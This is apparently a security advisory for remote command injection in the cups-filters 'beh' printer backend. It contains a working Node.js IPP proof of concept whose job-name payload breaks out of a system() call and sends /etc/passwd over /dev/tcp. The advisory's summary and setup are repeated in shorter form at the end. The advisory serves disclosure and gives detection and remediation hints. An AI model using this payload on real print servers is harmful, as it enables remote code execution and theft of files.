Summary
If beh is used to create a network-accessible printer, this vulnerability can lead to remote code execution.
Details
// (context: argv = beh <job-id> <user> <title> <copies> <options> [file])
snprintf(cmdline, sizeof(cmdline),
"%s/backend/%s '%s' '%s' '%s' '%s' '%s' %s",
cups_serverbin, scheme, argv[1], argv[2], argv[3],
...
(argc == 6 ? "1" : argv[4]),
argv[5], filename);
...
retval = system(cmdline) >> 8;
The system() function is called here to execute the command, and the user and title parameters are user-controlled and unsanitized.
PoC
-
Start a beh service: `lpadmin -p myprinter -E -v beh:/1/3/5/socket://printer:9100`
-
exploit: // https://github.com/williamkapke/ipp
// PoC client: submits an IPP Print-Job to the local CUPS instance whose
// "job-name" attribute carries shell metacharacters. The beh.c excerpt above
// shows the job title (argv[3]) being placed into a single-quoted '%s' slot
// of a command string that is then run with system(), so a title containing
// a quote breaks out of that slot. Nothing here depends on the printer
// itself; only the job-name (and, per the advisory, the user name) matters.
var ipp = require('ipp');               // IPP client library (github.com/williamkapke/ipp)
var PDFDocument = require('pdfkit');    // builds the minimal PDF document body
var concat = require("concat-stream");  // collects the PDF stream into a single buffer

// Minimal PDF; its content is irrelevant to the issue — CUPS only needs a
// document to accept the Print-Job.
var doc = new PDFDocument({margin:0});
doc.text("1.pdf", 0, 0);

doc.pipe(concat(function (data) {
  // Target: the beh queue created with `lpadmin -p myprinter ...`, reached on
  // the CUPS port of this test setup (6310 here; adjust to the local listener).
  var printer = ipp.Printer("http://127.0.0.1:6310/printers/myprinter");
  var msg = {
    "operation-attributes-tag": {
      // Becomes the <user> argument (argv[2]); the advisory notes it is
      // equally unsanitized, but this PoC only uses the title.
      "requesting-user-name": "Bumblebee",
      // Injection point: this value becomes the <title> argument (argv[3]) and
      // is interpolated into the system() command line unsanitized. Detection:
      // job titles containing quotes, ';' or '$' in CUPS job logs are the
      // signature of an attempt. Remediation direction: stop building a shell
      // command from job attributes (exec the backend with an argv array
      // instead of system()).
      "job-name": "';env; bash -c \"/usr/bin/cat ${PWD}etc/${PWD}/passwd > ${PWD}dev${PWD}tcp${PWD}127.0.0.1${PWD}1337\";'' #.pdf",
      "document-format": "application/pdf"
    },
    "job-attributes-tag":{
      "media-col": {
        "media-source": "tray-2"  // presumably unrelated to the injection — not discussed by the advisory
      }
    }
    , data: data  // the PDF bytes gathered by concat-stream
  };
  // Submit the job; the IPP response is only logged, the effect of the
  // payload is observed on the server side.
  printer.execute("Print-Job", msg, function(err, res){
    console.log(err);
    console.log(res);
  });
}));
doc.end();  // ends the PDF stream, which fires the concat callback above
Credits
Swing from Chaitin Security Research Lab
Summary
If beh is used to create a network-accessible printer, this vulnerability can lead to remote code execution.
Details
cups-filters/backend/beh.c
Line 288 in 5c9498a
The system() function is called here to execute the command, and the user and title parameters are user-controlled and unsanitized.
PoC
Start a beh service:
lpadmin -p myprinter -E -v beh:/1/3/5/socket://printer:9100
exploit: // https://github.com/williamkapke/ipp
Credits
Swing from Chaitin Security Research Lab